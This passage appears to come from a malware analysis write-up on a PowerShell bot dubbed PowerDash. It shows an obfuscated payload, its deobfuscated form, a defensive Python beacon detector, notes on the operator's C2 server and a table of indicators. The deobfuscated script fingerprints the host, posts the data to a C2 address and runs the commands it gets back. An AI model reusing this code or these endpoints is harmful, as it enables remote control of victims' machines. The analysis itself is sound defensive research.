${@}${[)$}${[*}+${@}${#+}${#+}+${@}${~*(}${~*(}${[*} + ${@}${~*(}${~*(}${'} +${@}${[)$}${[*} +${@}${#)``}${~*(}+ ${@}${[)$}${[*} +${@}${``}${``%}+ ${@}${'}${~*(}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${``}${;!@}+ ${@}${#)``}${'} +${@}${~*(}${``%}${;!@} +${@}${~*(}${``%}${#+}+ ${@}${'}${[)$} + ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+${@}${#+}${'} + ${@}${~*(}${~*(}${``%} +${@}${#+}${#+} +${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} +${@}${#)``}${'} + ${@}${'}${[)$}+ ${@}${'}${'} +${@}${#+}${;!@} + ${@}${.#=}${``%}+ ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${~*(}+${@}${#+}${#+}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``}+${@}${``}${~*(}+ ${@}${``}${#)``} + ${@}${'}${.#=} + ${@}${#+}${'}+${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$}+${@}${~*(}${``%} + ${@}${[)$}${[*}+${@}${[)$}${[*} +${@}${[)$}${[*} +${@}${[)$}${[*}+${@}${~*(}${``%}${[)$}+ ${@}${~*(}${~*(}${[*} +${@}${~*(}${~*(}${'}+${@}${[)$}${[*}+ ${@}${#)``}${~*(}+ ${@}${[)$}${[*}+${@}${``}${``%}+ ${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${``}${;!@} + ${@}${#)``}${'}+ ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+} +${@}${'}${[)$} +${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} + ${@}${#+}${'} + ${@}${~*(}${~*(}${``%} +${@}${#+}${#+} + ${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} + ${@}${#)``}${'} +${@}${'}${[)$}+ ${@}${'}${'} + ${@}${#+}${;!@} + ${@}${.#=}${#)``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${~*(} +${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${.#=}+ ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``}+ ${@}${~*(}${[*}${``}+ ${@}${[)$}${'}+${@}${~*(}${[*}${[)$} +${@}${[)$}${#)``} + ${@}${#+}${;!@}+ ${@}${``}${#)``} +${@}${'}${.#=}+ 
${@}${#+}${'}+${@}${~*(}${``%}${#+}+ ${@}${~*(}${``%}${~*(} +${@}${~*(}${[*}${;!@} +${@}${``}${~*(} +${@}${[)$}${[*} + ${@}${``}${;!@} +${@}${~*(}${``%}${#)``}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%} +${@}${``}${``%} + ${@}${[)$}${``} + ${@}${;!@}${#+}+${@}${[)$}${[*} +${@}${[)$}${``} + ${@}${``}${~*(} +${@}${[)$}${[*} +${@}${[)$}${[*} + ${@}${[)$}${[*} + ${@}${~*(}${[)$}+${@}${~*(}${``%} +${@}${~*(}${[*}${;!@} +${@}${~*(}${[)$} + ${@}${~*(}${``%}+${@}${[)$}${#)``} +${@}${~*(}${``%}${``}+ ${@}${~*(}${``%}${~*(}+${@}${#+}${'} + ${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*} + ${@}${[)$}${[*}+ ${@}${#)``}${~*(} + ${@}${[)$}${[*}+ ${@}${#)``}${``} + ${@}${~*(}${[*}${[)$}+ ${@}${[)$}${#+}+ ${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${#)``} +${@}${``}${;!@}+${@}${.#=}${``} + ${@}${~*(}${[*}${~*(}+${@}${~*(}${~*(}${[*} +${@}${~*(}${``%}${~*(}+ ${@}${[)$}${#+} +${@}${#)``}${~*(} +${@}${[)$}${#+}+ ${@}${#+}${'}+ ${@}${~*(}${~*(}${[*} + ${@}${~*(}${~*(}${[*} + ${@}${~*(}${``%}${.#=} +${@}${~*(}${``%}${;!@}+${@}${#+}${#+} + ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${``}${'} +${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%} +${@}${;!@}${#+} + ${@}${[)$}${[*}+ ${@}${#+}${#+} +${@}${~*(}${``%}${``} + ${@}${#+}${'} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${#)``}+${@}${#)``}${~*(}+ ${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${[*}+${@}${``}${;!@}+${@}${;!@}${#)``}+ ${@}${[)$}${#+}+${@}${~*(}${[*}${;!@} +${@}${~*(}${[)$}+ ${@}${~*(}${``%}+ ${@}${[)$}${#)``}+ ${@}${~*(}${~*(}${``} +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${~*(} 
+${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${;!@} +${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} +${@}${#)``}${~*(}+ ${@}${[)$}${[*} +${@}${'}${[)$} +${@}${~*(}${~*(}${#+}+${@}${~*(}${~*(}${``}+ ${@}${[)$}${[*}+ ${@}${[)$}${#)``} +${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${.#=} +${@}${[)$}${[*} + ${@}${``}${;!@} +${@}${'}${'}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${``} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${``%}+${@}${[)$}${[*}+ ${@}${.#=}${``%}+${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+ ${@}${[)$}${[*} +${@}${``}${;!@}+${@}${'}${[*} +${@}${~*(}${``%}${~*(}+ ${@}${#+}${'} + ${@}${~*(}${``%}${``%}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${;!@} + ${@}${[)$}${[*}+ ${@}${[)$}${#)``} +${@}${~*(}${``%}${``}+ ${@}${~*(}${``%}${~*(}+ ${@}${#+}${'} +${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*} +${@}${``}${;!@} + ${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${``%} +${@}${~*(}${[*}${~*(} +${@}${[)$}${[*} +${@}${``}${``%} + ${@}${[)$}${#)``} +${@}${#+}${.#=}+ ${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(}+${@}${~*(}${[*}${``}+${@}${#)``}${'}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${.#=}+ ${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${#)``}+ ${@}${.#=}${``}+${@}${~*(}${~*(}${~*(}+ ${@}${``}${;!@} +${@}${'}${``} +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+${@}${``}${~*(} + ${@}${[)$}${[*} + ${@}${``}${;!@} +${@}${.#=}${;!@} +${@}${~*(}${~*(}${;!@} +${@}${~*(}${``%}${~*(}+${@}${#)``}${#)``} +${@}${#+}${'}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${``%}${;!@}+ ${@}${#+}${#+}+ ${@}${.#=}${``%}+ ${@}${#+}${'} + ${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``%} + ${@}${~*(}${``%}${[)$}+${@}${~*(}${[)$}+${@}${~*(}${``%}+ ${@}${'}${[)$}+ ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${.#=}+ 
${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${'}+${@}${~*(}${``%}${~*(}+ ${@}${``}${;!@} + ${@}${#)``}${'}+ ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${#+} + ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${~*(}${``%}${``%} +${@}${[)$}${[*}+${@}${``}${``%} +${@}${#+}${~*(}+ ${@}${.#=}${[)$}+${@}${#+}${#+}+ ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${#)``}+${@}${#)``}${#)``}+ ${@}${~*(}${``%}${.#=} + ${@}${~*(}${~*(}${~*(} + ${@}${#+}${#+} + ${@}${~*(}${``%}${'}+ ${@}${#+}${[)$} +${@}${;!@}${.#=} + ${@}${;!@}${.#=}+ ${@}${#)``}${'}+ ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(}+ ${@}${#+}${'}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+${@}${``}${``%}+${@}${``}${``%} + ${@}${[)$}${#)``} + ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${~*(} +${@}${``}${#)``} +${@}${#)``}${'}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${[*}${``}+ ${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${.#=} +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${#)``} + ${@}${'}${``%}+${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+}+ ${@}${``}${;!@}+ ${@}${'}${``}+ ${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%} +${@}${``}${~*(} + ${@}${``}${#)``}+${@}${#+}${#+}+ ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${``%}+${@}${``}${~*(}+${@}${``}${~*(} ) " )
With some PowerShell syntax voodoo we were able to format and split the payload into two distinct parts:
- The first part incrementally builds up a set of variables.
- The second part takes these variables, assembles a large script chunk and executes it.
Since we can now see that the script is executed using the `.` (dot-sourcing) operator, all we have to do is replace it with a print statement and execute the script in a safe environment.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$url = "https://95.163.240.184:8000/dash/post_data/"
$body = @{
uuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
name = $env:COMPUTERNAME
os = (Get-WmiObject -Class Win32_OperatingSystem).Caption
lang = (Get-CimInstance CIM_VideoController|%{[int][math]::round($_.AdapterRAM/1GB)}) -join("; ")
domain = (Get-WmiObject -Class Win32_ComputerSystem).Domain
av = (Get-WmiObject -namespace root\SecurityCenter2 -class Antivirusproduct).DisplayName
cpu = (Get-CimInstance CIM_Processor).Name
gpu = (Get-CimInstance CIM_VideoController|%{$_.Name}) -join("; ")
}
$headers = @{'Content-Type'='application/json; charset=utf-8'}
$response = Iwr $url -Method Post -Headers $headers -body ($body|ConvertTo-Json) -UseBasicParsing
Invoke-Command ([ScriptBlock]::Create(($response.Content|ConvertFrom-Json).cmd))
The final payload is relatively small – all it does is collect a bunch of information about the host and then contact the C2 for commands to execute.
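The registration beacon above has a fixed shape: a JSON POST to /dash/post_data/ carrying eight host-fingerprint keys, answered with a JSON object whose cmd field is handed straight to Invoke-Command. The Python below is an added example, not code from the original analysis; it parses a constructed request/response pair in that shape, and the host values, C2 address and tasking string are placeholders.

```python
import json
from typing import Dict, Optional, Tuple

# Shape of the registration beacon, taken from the deobfuscated payload above.
REGISTRATION_PATH = "/dash/post_data/"
REGISTRATION_FIELDS = frozenset({"uuid", "name", "os", "lang", "domain", "av", "cpu", "gpu"})

# Constructed request/response pair modelled on the payload's behaviour. Host
# values, the C2 address and the tasking string are placeholders, not captures.
_BEACON_BODY = json.dumps({
    "uuid": "00000000-0000-0000-0000-000000000000",
    "name": "DESKTOP-1",
    "os": "Microsoft Windows 10 Pro",
    "lang": "4",                     # the payload stores GPU RAM in GB under this key
    "domain": "WORKGROUP",
    "av": "Windows Defender",
    "cpu": "Example CPU",
    "gpu": "Example GPU",
}, separators=(",", ":"))
SAMPLE_REQUEST = (
    "POST /dash/post_data/ HTTP/1.1\r\n"
    "Host: 192.0.2.20:8000\r\n"
    "Content-Type: application/json; charset=utf-8\r\n"
    f"Content-Length: {len(_BEACON_BODY)}\r\n"
    "\r\n" + _BEACON_BODY
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"cmd": "Start-Sleep -Seconds 3600"}'
)


def parse_http(message: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP message into its start line, lower-cased headers and body."""
    head, _, body = message.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def detect_registration(request: str) -> Optional[Dict[str, str]]:
    """Return the host fingerprint when a request is a PowerDash registration
    beacon (POST to /dash/post_data/ carrying all eight keys), else None."""
    start, headers, body = parse_http(request)
    parts = start.split()
    if len(parts) < 2 or parts[0] != "POST" or parts[1] != REGISTRATION_PATH:
        return None
    if not headers.get("content-type", "").startswith("application/json"):
        return None
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    if not isinstance(data, dict) or not REGISTRATION_FIELDS.issubset(data):
        return None
    return {key: str(data[key]) for key in sorted(REGISTRATION_FIELDS)}


def extract_tasking(response: str) -> Optional[str]:
    """Return the cmd string the bot would hand to Invoke-Command so an analyst
    can review it; None when the response carries no tasking."""
    _, _, body = parse_http(response)
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    cmd = data.get("cmd") if isinstance(data, dict) else None
    return cmd if isinstance(cmd, str) and cmd.strip() else None


if __name__ == "__main__":
    print(detect_registration(SAMPLE_REQUEST))
    print(extract_tasking(SAMPLE_RESPONSE))
```

Because the bot talks TLS with certificate validation disabled, this check only sees the body where TLS is terminated (an inspecting proxy) or on the host, for instance in PowerShell script block logs.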
C2 server
We decided to take a closer look at the C2 server.
Luckily for us, the malware operator left the DEBUG mode on.
The server is programmed in Python and uses several known libraries/frameworks like Django and Grappelli.
What's interesting for us is the /dash/ route – that's the endpoint infected bots talk to. We can see the /dash/post_data/ registration path as well as a few other endpoints that weren't mentioned in the previous stages. We suspect that the malware operator manually determines whether the victim is interesting enough and then drops further PowerShell scripts that contain more functionality.
While we were unable to download any additional payloads that would use the other C2 endpoints, we plan to monitor this malware family in case a threat actor decides to use it again.
IoC
| Value | Description |
|---|---|
| 5.63.152.179 | Host used for serving payloads |
| 95.163.240.184 | Host used as malware C2 |
| hxxps://95.163.240.184:8000/dash/post_data/ | C2 endpoint used for bot registration |
| hxxp://5.63.152.179/doc/zal_nr_1_zap_ofert(<digits>).doc | Malicious HTA script |
| hxxp://5.63.152.179/pl/1txt/<digits> | Malicious PowerShell script |
| hxxp://5.63.152.179/pl/2ht/<digits> | Malicious HTA script |
| hxxp://5.63.152.179/pl/3txt/<digits> | Malicious PowerShell script |
| d5c03af59492198d99889f5ec84f96129019ba933c5d8e3614866861c28ab4e6 | SHA256 of Zapytanie_ofertowe_2023_0118806.doc |
| 64502109c546fbd2d37644c030182a906b3871316b5086d31286c3697ca94362 | SHA256 of zal_nr_1_zap_ofert(8806).doc |
| 2fd5c1a3787eec4d9bd6f935e5b93af0f4fd454544b03c6aa70c94e4b55d22a7 | SHA256 of 8806 – Stager |
| ec0a53f40414c1a1419d458af90a74b58d654de4af67841d689fa9f296ca617d | SHA256 of 8806 – HTA persistence |
| a196711c42f3f3d378bf8232d3b10a92afd846b0f374cbf6cd54fcfda47b958d | SHA256 of 8806 – PowerDash payload |